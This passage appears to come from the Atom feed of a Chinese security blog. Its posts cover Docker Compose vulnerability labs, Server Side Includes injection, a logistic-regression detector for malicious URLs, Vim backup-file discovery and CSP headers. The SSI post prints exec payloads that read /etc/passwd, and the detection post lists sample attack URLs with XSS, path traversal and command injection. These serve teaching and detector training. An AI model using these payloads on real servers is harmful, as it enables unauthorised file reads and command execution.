    <content type="html"><![CDATA[<h2 id="Docker-Compose-概念"><a href="#Docker-Compose-概念" class="headerlink" title="Docker Compose 概念"></a>Docker Compose 概念</h2><p>可以在一个文件中定义一个多容器的应用，然后使用一条命令来启动你的应用，然后所有相关的操作都会被自动完成。</p>
<p>通过 Docker Compose 可以将多个 Docker 容器组合成一个应用。</p>
<p>以 WordPress 漏洞环境为例：</p>
<p>一个完整的环境需要 Web容器 MySQL PHP环境； 在 docker compose 的角度会把这三个环境分别部署到三个docker容器中，然后把他们连接起来共同组成了 WordPress 的漏洞环境，如何定义这些容器以及如何连接成一个整体，请参照 Docker Compose 配置文件。</p>
<p>在 Docker Compose 配置文件中：所有的容器通过services来定义，然后使用docker-compose脚本来启动，停止和重启应用，和应用中的服务以及所有依赖服务的容器。</p>
<p>Docker Compose 配置文件详解参照： <a href="http://dockone.io/article/834" target="_blank" rel="external">http://dockone.io/article/834</a></p>
<p>而且可以通过修改本地文件的方式对 Docker 镜像中的文件做修改，相当于 把宿主机的文件 与 docker 镜像中的文件做了映射关系，这个我觉得非常好用。</p>
<p>之前对 docker 镜像做修改的步骤如下：</p>
<ol>
<li>启动 docker 容器</li>
<li>进入容器做相应的修改</li>
<li>重新封装成一个新的镜像</li>
</ol>
<p>现在有了 Docker Compose 是不是更简单了些？</p>
<h2 id="使用-Docker-Compose-创建应用"><a href="#使用-Docker-Compose-创建应用" class="headerlink" title="使用 Docker Compose 创建应用"></a>使用 Docker Compose 创建应用</h2><h3 id="使用-DockerFile-定义应用环境"><a href="#使用-DockerFile-定义应用环境" class="headerlink" title="使用 DockerFile 定义应用环境"></a>使用 DockerFile 定义应用环境</h3><pre><code>FROM python:2.7
ADD . /code
WORKDIR /code
RUN pip install -r requirements.txt
</code></pre><p>上面是DockerFile指令，说说对应指令：</p>
<p>FROM 来源镜像 首选本地是否存在，如果不存在则会从公共仓库下载</p>
<p>ADD 把文件拷贝到容器相应文件下 在这里是吧当前目录的所有文件拷贝到 容器中/code 中</p>
<p>WORKDIR RUN、CMD和ENTRYPOINT指令默认的工作目录，不指定默认为根目录。</p>
<p>RUN  执行容器内的 bash 命令</p>
<h3 id="使用-compose-yaml-定义应用服务"><a href="#使用-compose-yaml-定义应用服务" class="headerlink" title="使用 compose.yaml 定义应用服务"></a>使用 compose.yaml 定义应用服务</h3><p>通过 Compose 配置文件，可以把不同服务生成的不同容器组成你的应用。</p>
<p>配置文件示例：</p>
<pre><code>web:
  build:.
  command: python app.py
  ports:
         - &quot;5000:5000&quot;
  volumes:
         - .:/code
  links:
         - redis
redis:
  image: redis
</code></pre><p>在配置文件中定义了两个应用 web 和 redis， 通过 links 把两个容器连接起来，对外暴露的是 web 容器的 5000端口， volumes 定义磁盘映射，把当前目录的所有文件 映射到 web 容器的 /code 的目录中，以后可以直接修改当前目录的文件对容器做修改啦。</p>
<h3 id="启动容器"><a href="#启动容器" class="headerlink" title="启动容器"></a>启动容器</h3><p>执行docker-compose up来启动你的应用，它会根据compose.yaml的设置来pull/run这俩个容器，然后再启动。</p>
<p>docker-compose up -d在后台启动服务</p>
<p>docker-compose ps命令查看启动的服务</p>
<p>docker-compose stop停止服务</p>
<p>参考：</p>
<ol>
<li><a href="http://debugo.com/docker-compose/" target="_blank" rel="external">http://debugo.com/docker-compose/</a></li>
<li><a href="http://dockone.io/article/834" target="_blank" rel="external">http://dockone.io/article/834</a></li>
<li><a href="http://blog.csdn.net/wangtaoking1/article/details/44278951" target="_blank" rel="external">http://blog.csdn.net/wangtaoking1/article/details/44278951</a></li>
</ol>
]]></content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;Docker-Compose-概念&quot;&gt;&lt;a href=&quot;#Docker-Compose-概念&quot; class=&quot;headerlink&quot; title=&quot;Docker Compose 概念&quot;&gt;&lt;/a&gt;Docker Compose 概念&lt;/h2&gt;&lt;p&gt;可以在一个文件中定义
    
    </summary>
    
    
      <category term="Docker" scheme="http://www.evilclay.com/tags/Docker/"/>
    
      <category term="漏洞环境" scheme="http://www.evilclay.com/tags/%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83/"/>
    
  </entry>
  
  <entry>
    <title>SSI-服务端包含注入</title>
    <link href="http://www.evilclay.com/2017/04/28/SSI-%E6%9C%8D%E5%8A%A1%E7%AB%AF%E5%8C%85%E5%90%AB%E6%B3%A8%E5%85%A5/"/>
    <id>http://www.evilclay.com/2017/04/28/SSI-服务端包含注入/</id>
    <published>2017-04-27T18:28:28.000Z</published>
    <updated>2017-04-27T18:29:28.263Z</updated>
    
    <content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>看到 <a href="http://www.mottoin.com/101526.html" target="_blank" rel="external">MottoIN</a> 上有个 SSI 的文章，正好学习一番。</p>
<h2 id="SSI"><a href="#SSI" class="headerlink" title="SSI"></a>SSI</h2><p>SSI是英文Server Side Includes的缩写，SSI是嵌入HTML页面中的指令，在页面被提供时由服务器进行运算，以对现有HTML页面增加动态生成的内容，而无须通过CGI程序提供其整个页面，或者使用其他动态技术。</p>
<p>至于什么时候应当用SSI ，而什么时候应当用某些程序生成整个页面，取决于页面中有多少内容是静态的，又有多少内容需要在每次页面被提供时重新计算。SSI是一种增加小段动态信息的好方法，比如当前时间。如果你的页面大部分内容是在被提供时动态生成的，那就要另找方案了。</p>
<p>SSI固然不能替代CGI或者其他动态页面技术，但它是在页面中插入众多小型的动态片段的优秀方法，而无须大量额外的操作。</p>
<p>现在这种业务少了，洞也少了，重在记录学习过程。</p>
<h2 id="启用-SSI"><a href="#启用-SSI" class="headerlink" title="启用 SSI"></a>启用 SSI</h2><blockquote>
<p>环境： Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.3.29</p>
</blockquote>
<p>Apache默认未启用 SSI ，若使用 SSI，需要对做以下配置：</p>
<p>打开 Apache 配置文件 httpd.conf ：</p>
<ol>
<li>确认加载include.so模块，将注释去掉：LoadModule include_module libexec/apache2/mod_include.so</li>
<li>AddType部分去掉这两段注释：AddType text/html .shtmlAddOutputFilter INCLUDES .shtml</li>
<li>Directory目录权限里面找到Options Indexes FollowSymLinks 增加 Includes<br> 比如，修改成：Options +Indexes +FollowSymLinks +ExecCGI +Includes</li>
<li>重新启动 Apache</li>
</ol>
<p>此外，IIS 和 <a href="http://www.kubiji.cn/topic-id998.html" target="_blank" rel="external">Nginx</a> 都可以开启 SSI 功能，这里不在赘述方法。</p>
<h2 id="SSI-的能力"><a href="#SSI-的能力" class="headerlink" title="SSI 的能力"></a>SSI 的能力</h2><p>要想知道 SSI 能做出什么好玩的，首先要了解 SSI 的指令。</p>
<p>SSI 的语法如下：</p>
<pre><code>&lt;!--#element attribute=value attribute=value ... --&gt;
</code></pre><p>类似于HTML注释，即使没有正确配置SSI ，它也不会被浏览器显示，但在HTML代码中可见。而若正确配置了SSI ，则 SSI 指令会被其结果所取代。</p>
<h3 id="SSI-支持的指令"><a href="#SSI-支持的指令" class="headerlink" title="SSI 支持的指令"></a>SSI 支持的指令</h3><p><strong>echo 指令</strong> 将环境变量输出到页面</p>
<p>语法： <code>&lt;!--#echo var=&quot;变量名称&quot;--&gt;</code></p>
<p>例子：</p>
<pre><code>&lt;!--#echo var=&quot;DOCUMENT_NAME&quot;--&gt;  // 文档名称
&lt;!--#echo var=&quot;DATE_LOCAL&quot;--&gt;  // 现在时间
&lt;!--#echo var=&quot;REMOTE_ADDR&quot;--&gt;   // 访客 IP 地址
</code></pre><p><strong>include 指令</strong>  包含一个php文件 类似于include函数</p>
<p>语法：</p>
<pre><code>&lt;!--#include virtual=&quot;文件名称&quot;--&gt;
&lt;!--#include file=&quot;文件名称&quot;--&gt;
</code></pre><p>参数：</p>
<p><strong>file 指定</strong> 包含文件相对于本文档的位置，不允许包含上级目录的文件；</p>
<p>virtual 指定相对于服务器文档根目录的位置。</p>
<p>例子:</p>
<pre><code>&lt;!--#include virtual=&quot;/footer.html&quot; --&gt; // 包含标准页脚
</code></pre><p><strong>flastmod 和 fsize 指令</strong></p>
<p>参数和 include 参数一样有 file 和 virtual ；</p>
<p>flastmod 和 fsize 用于输出文件的最后修改时间 和 文件大小。</p>
<p>例子：</p>
<pre><code>&lt;!--#flastmod file=&quot;文件名称&quot;--&gt;
&lt;!--#fsize file=&quot;文件名称&quot;--&gt;
</code></pre><p><strong>exec 指令</strong> 将某一外部程序的输出插入到页面中。可插入CGI程序或者是bash/cmd命令（命令执行），这取决于使用的参数是cmd还是cgi。</p>
<p>参数：</p>
<p>cmd bash命令行</p>
<p>cgi CGI脚本程序</p>
<p>示例：</p>
<pre><code>&lt;!--#exec cmd=&quot;cat /etc/passwd&quot;--&gt;；将会显示密码文件

&lt;!--#exec cmd=&quot;dir /b&quot;--&gt;；将会显示当前目录下文件列表　

&lt;!--#exec cgi=&quot;/cgi-bin/gb.cgi&quot;--&gt;；将会执行CGI程序gb.cgi。

&lt;!--#exec cgi=&quot;/cgi-bin/access_log.cgi&quot;--&gt;；将会执行CGI程序access_log.cgi。
</code></pre><p>可以看出，从上面的示例可以看出，这个指令相当方便，但是也存在重大的安全隐患。</p>
<p>config 指令 指定返回给客户端浏览器的错误信息、日期和文件大小的格式。</p>
<p>语法：</p>
<pre><code>&lt;!--#config errmsg=&quot;自定义错误信息&quot;--&gt;

&lt;!--#config sizefmt=&quot;显示单位&quot;--&gt;

&lt;!--#config timefmt=&quot;显示格式&quot;--&gt;
</code></pre><p>参数：</p>
<p>errmsg 自定义SSI执行错误信息，可以为任何你喜欢的方式。</p>
<p>sizefmt 文件大小显示方式，默认为字节方式（”bytes”)可以改为千字节方式（”abbrev”)</p>
<p>timefmt 时间显示方式，最灵活的配置属性。</p>
<p>示例：</p>
<pre><code>显示一个不存在文件的大小

&lt;!--#config errmsg=&quot;服务器执行错误，请联系管理员，谢谢！&quot;--&gt;

&lt;!--#fsize file=&quot;不存在的文件.htm&quot;--&gt;

&lt;!--#config timefmt=&quot;%Y年/%m月%d日 星期%W 北京时间%H:%M:%s，%Y年已过去了%j天 今天是%Y年的第%U个星期&quot;--&gt;
</code></pre><h2 id="SSI-业务场景"><a href="#SSI-业务场景" class="headerlink" title="SSI 业务场景"></a>SSI 业务场景</h2><p>从定义中看出，页面中有一小部分是动态输出的时候使用SSI，</p>
<p>比如：</p>
<pre><code>文件相关的属性字段
当前时间
访客IP
调用 CGI 程序
</code></pre><h2 id="SSI-注入条件"><a href="#SSI-注入条件" class="headerlink" title="SSI 注入条件"></a>SSI 注入条件</h2><ol>
<li>支持 SSI</li>
<li>用户输入能够嵌入到响应页面</li>
<li>用户输入的SSI关键字未被过滤</li>
</ol>
<h2 id="挖掘-SSI-注入"><a href="#挖掘-SSI-注入" class="headerlink" title="挖掘 SSI 注入"></a>挖掘 SSI 注入</h2><p>两个思路：</p>
<p>第一个方面从业务场景的几个情况来 Fuzz</p>
<p>第二方面可以关注 .stm，.shtm和.shtml 这三种扩展名。</p>
<h2 id="SSI-注入危害"><a href="#SSI-注入危害" class="headerlink" title="SSI 注入危害"></a>SSI 注入危害</h2><p>可以导致命令执行（exec指令），本地文件包含（include指令）。</p>
<h2 id="SSI-注入防护"><a href="#SSI-注入防护" class="headerlink" title="SSI 注入防护"></a>SSI 注入防护</h2><p>若可以，请关闭服务器对 SSI 的支持；</p>
<p>过滤 SSI 关键字（&lt; &gt; # - “ ‘）。</p>
<p>参考：</p>
<ol>
<li><a href="http://www.kubiji.cn/topic-id998.html" target="_blank" rel="external">http://www.kubiji.cn/topic-id998.html</a></li>
<li><a href="https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection" target="_blank" rel="external">https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection</a></li>
</ol>
]]></content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h2&gt;&lt;p&gt;看到 &lt;a href=&quot;http://www.mottoin.com/101526.html&quot; target=&quot;_blank&quot; rel=&quot;e
    
    </summary>
    
    
      <category term="SSI|服务端包含注入" scheme="http://www.evilclay.com/tags/SSI-%E6%9C%8D%E5%8A%A1%E7%AB%AF%E5%8C%85%E5%90%AB%E6%B3%A8%E5%85%A5/"/>
    
  </entry>
  
  <entry>
    <title>基于机器学习的恶意 URL 检测</title>
    <link href="http://www.evilclay.com/2017/04/04/%E5%9F%BA%E4%BA%8E%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0%E7%9A%84%E6%81%B6%E6%84%8FURL%E6%A3%80%E6%B5%8B/"/>
    <id>http://www.evilclay.com/2017/04/04/基于机器学习的恶意URL检测/</id>
    <published>2017-04-04T10:46:24.000Z</published>
    <updated>2017-04-04T17:20:26.565Z</updated>
    
    <content type="html"><![CDATA[<p>在Freebuf 上之前也发过一些机器学习应用于Web异常检测的文章，阐述了几种检测模型的建立方式，可以先了解一番。本文参考了国外的<a href="http://fsecurify.com/fwaf-machine-learning-driven-web-application-firewall/" target="_blank" rel="external">一篇博文</a>，英语好的可以直接看下原文，在这里记录了下研究检测模型实现的过程，因为也是最近才接触机器学习这块，有啥问题请大牛们指出。</p>
<p>先说重点，这篇文章使用逻辑回归的方式建立检测模型，对未知的 URL 进行检测。</p>
<p>模型建立的整体思路如下：</p>
<ol>
<li>分别拿到正常请求和恶意请求的数据集。</li>
<li>对无规律的数据集进行处理得到特征矩阵。</li>
<li>使用机器逻辑回归算法拿特征矩阵训练检测模型。</li>
<li>最后使用检测模型判断新的 URL 请求是恶意的还是正常的。</li>
</ol>
<h2 id="收集数据集"><a href="#收集数据集" class="headerlink" title="收集数据集"></a>收集数据集</h2><p>我们需要分别拿到恶意的数据集和正常的数据集用来后期处理，在这里恶意的数据集来自 <a href="https://github.com/foospidy/payloads" target="_blank" rel="external">https://github.com/foospidy/payloads</a> 中的一些 XSS SQL注入等攻击的payload，结合github上一些知名仓库的payload，一共整理出 50000 条恶意请求作为恶意的数据集；正常请求的数据集来自于<a href="http://secrepo.com/" target="_blank" rel="external">http://secrepo.com/</a> , 攻击1000000条日志请求（资源有限，假定认为这些数据全部都是正常的请求，有精力可以进行降噪处理）。</p>
<p>恶意请求部分样本：</p>
<pre><code>/top.php?stuff=&apos;uname &gt;q36497765 #
/h21y8w52.nsf?&lt;script&gt;cross_site_scripting.nasl&lt;/script&gt;
/ca000001.pl?action=showcart&amp;hop=\&quot;&gt;&lt;script&gt;alert(&apos;vulnerable&apos;)&lt;/script&gt;&amp;path=acatalog/
/scripts/edit_image.php?dn=1&amp;userfile=/etc/passwd&amp;userfile_name= ;id; 
/javascript/mta.exe
/examples/jsp/colors/kernel/loadkernel.php?installpath=/etc/passwd\x00
/examples/jsp/cal/feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&amp;debug=1
/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
/cgi-bin/script/cat_for_gen.php?ad=1&amp;ad_direct=../&amp;m_for_racine=&lt;/option&gt;&lt;/select&gt;&lt;?phpinfo();?&gt;
/examples/jsp/cal/search.php?allwords=&lt;br&gt;&lt;script&gt;foo&lt;/script&gt;&amp;cid=0&amp;title=1&amp;desc=1
</code></pre><p>正常请求部分样本：</p>
<pre><code>/rcanimal/
/458010b88d9ce/
/cclogovs/
/using-localization/
/121006_dakotacwpressconf/
/50393994/
/166636/
/labview_v2/
/javascript/nets.png
/p25-03/
/javascript/minute.rb
/javascript/weblogs.rss
/javascript/util.rtf
</code></pre><h2 id="计算特征矩阵"><a href="#计算特征矩阵" class="headerlink" title="计算特征矩阵"></a>计算特征矩阵</h2><p>无论是恶意请求数据集还是正常请求数据集，都是不定长的字符串列表，很难直接用逻辑回归算法对这些不规律的数据进行处理，所以，需要找到这些文本的数字特征，用来训练我们的检测模型。</p>
<p>在这里，我们使用 Tfidvectorizer（TD-IDF） 来提取文本的特征，并以数字矩阵的形式进行输出。</p>
<p>TD-IDF 是一种用于资讯检索与文本挖掘的常用加权技术，被经常用于描述文本特征。</p>
<p>实际上是：TF * IDF，TF 词频（Term Frequency），IDF 逆向文件频率（Inverse Document Frequency）。</p>
<p>这里简单说下他们的概念，感兴趣的可以搜搜资料：</p>
<p>TF表示词条在某文档中出现的频率。<br>IDF的主要思想是：如果包含词条的文档越少，则 IDF越大，说明该词条具有很好的类别区分能力。</p>
<p>TF-IDF 倾向于过滤掉常见的词语，保留重要的词语。</p>
<p>要计算 TD-IDF 之前首先需要对 每个文档（URL请求）的内容进行分词处理，也就是需要定义文档的词条长度，这里我们选择长度为3，可以根据模型的准确度对这个参数进行调整。</p>
<p>比如：<br>// URL 请求<br>www.foo.com/1<br>// 经过分词后<br>[‘www’,’ww.’,’w.f’,’.fo’,’foo’,’oo.’,’o.c’,’.co’,’com’,’om/‘,’m/1’]</p>
<p>下面对所有 URL 请求计算出 TD-IDF 特征矩阵，输出格式基本上是下面的样子：</p>
<pre><code>(0, 31445)    0.0739022819816
(0, 62475)    0.0629894240925
(0, 46832)    0.0589025342739
(0, 77623)    0.0717033170552
(0, 35908)    0.0882896248394

:    省略 :

(1310503, 17869)    0.245096903287
(1310503, 7490)    0.350336780418
(1310504, 8283)    0.344234609884
(1310504, 72979)    0.265488228146
(1310504, 67485)    0.253863271567
(1310504, 37730)    0.328153786399
</code></pre><p>可以看出特征矩阵的元素由[(i,j) weight] 三个元素组成，</p>
<p>在矩阵中：<br>i 对应于集合中的文档编号，列对应于术语term（或者说是词片？）<br>矩阵元素[(i,j) weight] 表示编号 为 j 的词片 在编号为 i 的文档下的 fd-idf 值（weight）。<br>比如： (0, 31445)    0.0739022819816  表示词片编号31445的在第0号文档的权值是 0.0739022819816</p>
<h2 id="训练检测模型"><a href="#训练检测模型" class="headerlink" title="训练检测模型"></a>训练检测模型</h2><p>现在有了特征矩阵作为训练数据，可以直接使用逻辑回归的方法来训练我们的模型，这一步需要电脑花点时间对数据进行处理，但是Python已经有强大的库给我们直接提供了训练入口(fit函数)，所以只需要定义一个逻辑模型实例，然后调用训练方法，传值训练数据即可，代码如下：</p>
<pre><code>lgs = LogisticRegression()
lgs.fit(x_train, y_train)
// x_train 是特征矩阵，y_train 是该条矩阵的分词对应的检测输出（正常是0 恶意是1）的列表
</code></pre><h2 id="测试模型效果"><a href="#测试模型效果" class="headerlink" title="测试模型效果"></a>测试模型效果</h2><p>经过训练之后 lgs 提供 score 方法 选择一批测试数据来计算模型的准确度，初步测试，准确度也不算低。</p>
<pre><code>lgs.score(x_test, y_test)
// output: 99 %
</code></pre><p>同时，可以调用 lgs.predict 的方法对 新的 URL 进行恶意判定。</p>
<pre><code>x_predict = [&apos;http://www.foo.com/id=1&lt;script&gt;alert(1)&lt;/script&gt;&apos;,&apos;www.foo.com/login.html&apos;]
x_predict = vectorizer.transform(x_predict)
x_Predict = lgs.predict(x_predict)
// output: [1,0]
</code></pre><p>粗略的测试了几组数据，结果如下：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/aiwaf/aiwaf.png" alt="结果输出" title="">
                </div>
                <div class="image-caption">结果输出</div>
            </figure>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>基于逻辑回归的恶意URL检测很依赖于训练数据集，有必要保证原始数据集尽可能的减少噪点（异常数据），以及每条数据之间尽可能的减少关联性。<br>若能拿到自身业务中确定正常或者威胁的请求数据作为训练数据集训练出的模型应该也更加适用于当前环境的检测。<br>同时作为监督式学习，可以定期把检测出确定威胁的请求放入原始数据集中，对检测模型进行优化。</p>
<p>源码地址：</p>
<p><a href="https://github.com/exp-db/AI-Driven-WAF" target="_blank" rel="external">https://github.com/exp-db/AI-Driven-WAF</a></p>
<p>参考：</p>
<p><a href="http://www.freebuf.com/articles/web/126543.html" target="_blank" rel="external">http://www.freebuf.com/articles/web/126543.html</a><br><a href="http://fsecurify.com/fwaf-machine-learning-driven-web-application-firewall/" target="_blank" rel="external">http://fsecurify.com/fwaf-machine-learning-driven-web-application-firewall/</a><br><a href="http://scikit-learn.org/stable/modules/feature_extraction.html#text-feature-extraction" target="_blank" rel="external">http://scikit-learn.org/stable/modules/feature_extraction.html#text-feature-extraction</a></p>
]]></content>
    
    <summary type="html">
    
      &lt;p&gt;在Freebuf 上之前也发过一些机器学习应用于Web异常检测的文章，阐述了几种检测模型的建立方式，可以先了解一番。本文参考了国外的&lt;a href=&quot;http://fsecurify.com/fwaf-machine-learning-driven-web-applicat
    
    </summary>
    
    
  </entry>
  
  <entry>
    <title>谈谈 Vim 的几种文件备份</title>
    <link href="http://www.evilclay.com/2017/03/31/%E8%B0%88%E8%B0%88-Vim-%E7%9A%84%E5%87%A0%E7%A7%8D%E6%96%87%E4%BB%B6%E5%A4%87%E4%BB%BD/"/>
    <id>http://www.evilclay.com/2017/03/31/谈谈-Vim-的几种文件备份/</id>
    <published>2017-03-31T11:32:24.000Z</published>
    <updated>2017-03-31T14:01:04.896Z</updated>
    
    <content type="html"><![CDATA[<p>源自 MCTF 看到了 Vim 的 undo 备份，顺手学习了下 Vim 的几种备份机制，或有疏漏，请指出。</p>
<h3 id="1-Vim-的交换文件-filename-swp"><a href="#1-Vim-的交换文件-filename-swp" class="headerlink" title="1. Vim 的交换文件  .filename.swp"></a>1. Vim 的交换文件  .filename.swp</h3><p>默认交换文件在打开文件的时候就会产生交换文件，正常退出的时候才会删除交换文件（断电，Ctrl+Z强制退出就不会删除），内容大致是这个样子。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/vimswp.png" alt="swpdemo" title="">
                </div>
                <div class="image-caption">swpdemo</div>
            </figure>
<p>通过在 Vim 配置文件设置 set noswapfile 来关闭交换文件。</p>
<h3 id="2-Vim-的备份文件-filename"><a href="#2-Vim-的备份文件-filename" class="headerlink" title="2. Vim 的备份文件 filename~"></a>2. Vim 的备份文件 filename~</h3><p>默认关闭，需要通过设置 set backup 来开启，Unbuntu的Vim配置文件是 /etc/vim/vimrc</p>
<p>开启后，对文件进行修改后会保存修改之前的一个副本，展示如下：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/vimbackup.png" alt="~Demo" title="">
                </div>
                <div class="image-caption">~Demo</div>
            </figure>
<p>如果不喜欢 ~ 作为备份文件的后缀，可以使用 set backupext=.bak 来设置备份文件的扩展名。</p>
<p>当然可以通过设置 set nobackup 来关闭备份文件。</p>
<h3 id="3-undo-备份文件-filename-un"><a href="#3-undo-备份文件-filename-un" class="headerlink" title="3. undo 备份文件  .filename.un.~"></a>3. undo 备份文件  .filename.un.~</h3><p>默认关闭，需要设置 set undofile 来开启 undo 备份文件。这是 Vim 官方给出的 undo 备份文件的解释：</p>
<p>When on, Vim automatically saves undo history to an undo file when writing a buffer to a file, and restores undo history from the same file on buffer read.</p>
<p>也就是说开启时，在 Vim 中编辑文件是使用了 撤销更改（u命令）的操作，会把撤销更改的那部分保存到缓存文件 .<filename>.un.~ 中。</filename></p>
<p>测试发现这个 undo 缓存文件是追加写入的，所以你所有的撤销操作都会在这个文件中找到。</p>
<p>内容大概是这个样子：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/vimundo.png" alt="undodemo" title="">
                </div>
                <div class="image-caption">undodemo</div>
            </figure>
<h3 id="4-PS"><a href="#4-PS" class="headerlink" title="4. PS"></a>4. PS</h3><p>默认缓存文件会在当前目录下生成，可以通过修改配置文件的方式指定自动保存位置。</p>
<p>参考连接中有提高可以通过 Vim 的备份机制实现 内容的版本控制。</p>
<p>我们可以从漏洞挖掘的角度延伸一点点，像 敏感文件扫描这种工具一般都是一个敏感文件列表无脑开扫，若是增加一个功能：</p>
<p>结合爬虫已经爬取到的文件和目录，生成相应的缓存/备份文件，是不是又会有新的发现 :p</p>
<h3 id="5-参考"><a href="#5-参考" class="headerlink" title="5. 参考"></a>5. 参考</h3><p><a href="http://blog.163.com/yysfire@126/blog/static/1831747201011443159904/" target="_blank" rel="external">http://blog.163.com/yysfire@126/blog/static/1831747201011443159904/</a></p>
]]></content>
    
    <summary type="html">
    
      &lt;p&gt;源自 MCTF 看到了 Vim 的 undo 备份，顺手学习了下 Vim 的几种备份机制，或有疏漏，请指出。&lt;/p&gt;
&lt;h3 id=&quot;1-Vim-的交换文件-filename-swp&quot;&gt;&lt;a href=&quot;#1-Vim-的交换文件-filename-swp&quot; class=&quot;h
    
    </summary>
    
    
      <category term="Vim" scheme="http://www.evilclay.com/tags/Vim/"/>
    
      <category term="缓存文件" scheme="http://www.evilclay.com/tags/%E7%BC%93%E5%AD%98%E6%96%87%E4%BB%B6/"/>
    
      <category term="敏感文件探测" scheme="http://www.evilclay.com/tags/%E6%95%8F%E6%84%9F%E6%96%87%E4%BB%B6%E6%8E%A2%E6%B5%8B/"/>
    
  </entry>
  
  <entry>
    <title>CSP（内容安全策略）学习</title>
    <link href="http://www.evilclay.com/2017/03/13/tmp/"/>
    <id>http://www.evilclay.com/2017/03/13/tmp/</id>
    <published>2017-03-13T13:05:04.000Z</published>
    <updated>2017-03-13T13:59:36.818Z</updated>
    
    <content type="html"><![CDATA[<p>今天在一段 PHP 验证码代码中包含了以下内容，怀着好奇的心里研究了一下~</p>
<p>header(“Content-Security-Policy: default-src ‘self’; style-src ‘self’ ‘unsafe-inline’; img-src ‘self’ data:; frame-src ‘none’”);<br>header(“X-Content-Security-Policy: default-src ‘self’; style-src ‘self’ ‘unsafe-inline’; img-src ‘self’ data:; frame-src ‘none’”);<br>header(“X-WebKit-CSP: default-src ‘self’; style-src ‘self’ ‘unsafe-inline’;img-src ‘self’ data:; frame-src ‘none’”);<br>header(“X-XSS-Protection: 1; mode=block”);<br>header(“X-Content-Type-Options: nosniff”);<br>header(“X-Frame-Options: DENY”);</p>
<p>我们来先说一下CSP， 内容安全策略 (CSP, Content Security Policy) 是一个附加的安全层，用于帮助检测和缓解某些类型的攻击，包括跨站脚本 (XSS) 和数据注入等攻击。 这些攻击可用于实现从数据窃取到网站破坏或作为恶意软件分发版本等用途。</p>
<h4 id="Content-Security-Policy"><a href="#Content-Security-Policy" class="headerlink" title="Content-Security-Policy"></a>Content-Security-Policy</h4><p>这个字段表示内容安全策略，也就是大名鼎鼎的 CSP ，主要是定义页面可以加载哪些资源，减少 XSS 的发生。</p>
<p>Content-Security-Policy 由一组指令+指令值对组成。目前的所有指令值可以<a href="https://imququ.com/post/content-security-policy-reference.html" target="_blank" rel="external">参考这里</a>，这里仅仅对上面的栗子给出说明：</p>
<p>default-src ‘self’; 表示所有资源（js、image、css、web font，ajax）的默认加载策略是同源的。</p>
<p>style-src ‘self’ ‘unsafe-inline’;  表示 css 的加载策略是同源和行内css。</p>
<p>img-src ‘self’ data:;  表示 css 加载策略是同源和data协议。</p>
<p>frame-src ‘none’  表示不允许加载frame</p>
<h4 id="X-Content-Security-Policy"><a href="#X-Content-Security-Policy" class="headerlink" title="X-Content-Security-Policy"></a>X-Content-Security-Policy</h4><p>这个字段的作用同 Content-Security-Policy，早期的 Chrome 是通过 X-WebKit-CSP 响应头来支持 CSP 的，而 firefox 和 IE 则支持 X-Content-Security-Policy，Chrome25 和 Firefox23 开始支持标准的 Content-Security-Policy。</p>
<h4 id="X-WebKit-CSP"><a href="#X-WebKit-CSP" class="headerlink" title="X-WebKit-CSP"></a>X-WebKit-CSP</h4><p>X-WebKit-CSP 是早期 Chrome 和 Safari 支持的，作用同上。</p>
<h4 id="X-XSS-Protection"><a href="#X-XSS-Protection" class="headerlink" title="X-XSS-Protection"></a>X-XSS-Protection</h4><p>X-XSS-Protection: 1; mode=block  主要是控制 IE8+ 和 Webkit browsers 浏览器开启 XSS 防护功能，阻止反射型 XSS 呈现页面，并不会清理 XSS。</p>
<h4 id="X-Content-Type-Options"><a href="#X-Content-Type-Options" class="headerlink" title="X-Content-Type-Options"></a>X-Content-Type-Options</h4><p>X-Content-Type-Options: nosniff 禁用浏览器的类型猜测行为，也就是说Content-Type是错的或者未定义的时候，不会解析执行响应内容。</p>
<h4 id="X-Frame-Options"><a href="#X-Frame-Options" class="headerlink" title="X-Frame-Options"></a>X-Frame-Options</h4><p>X-Frame-Options 用来给浏览器指示允许一个页面可否在frame , iframe 或者object 中展现的标记。DENY 表示不允许被陷入到其他 frame /iframe 中。</p>
<h4 id="题外话"><a href="#题外话" class="headerlink" title="题外话"></a>题外话</h4><p>差了些相关资料，发现前端果然很乱啊，一种功能在不同的浏览器中有不同的实现形式。。。</p>
]]></content>
    
    <summary type="html">
    
      &lt;p&gt;今天在一段 PHP 验证码代码中包含了以下内容，怀着好奇的心里研究了一下~&lt;/p&gt;
&lt;p&gt;header(“Content-Security-Policy: default-src ‘self’; style-src ‘self’ ‘unsafe-inline’; img-s
    
    </summary>
    
    
      <category term="XSS防护" scheme="http://www.evilclay.com/tags/XSS%E9%98%B2%E6%8A%A4/"/>
    
      <category term="CSP策略" scheme="http://www.evilclay.com/tags/CSP%E7%AD%96%E7%95%A5/"/>
    
  </entry>
  
  <entry>
    <title>Apache 绑定多域名/多端口配置命令</title>
    <link href="http://www.evilclay.com/2017/03/13/Apache%E7%BB%91%E5%AE%9A%E5%A4%9A%E5%9F%9F%E5%90%8D%20or%20%E5%A4%9A%E7%AB%AF%E5%8F%A3%E9%85%8D%E7%BD%AE%E5%91%BD%E4%BB%A4/"/>
    <id>http://www.evilclay.com/2017/03/13/Apache绑定多域名 or 多端口配置命令/</id>
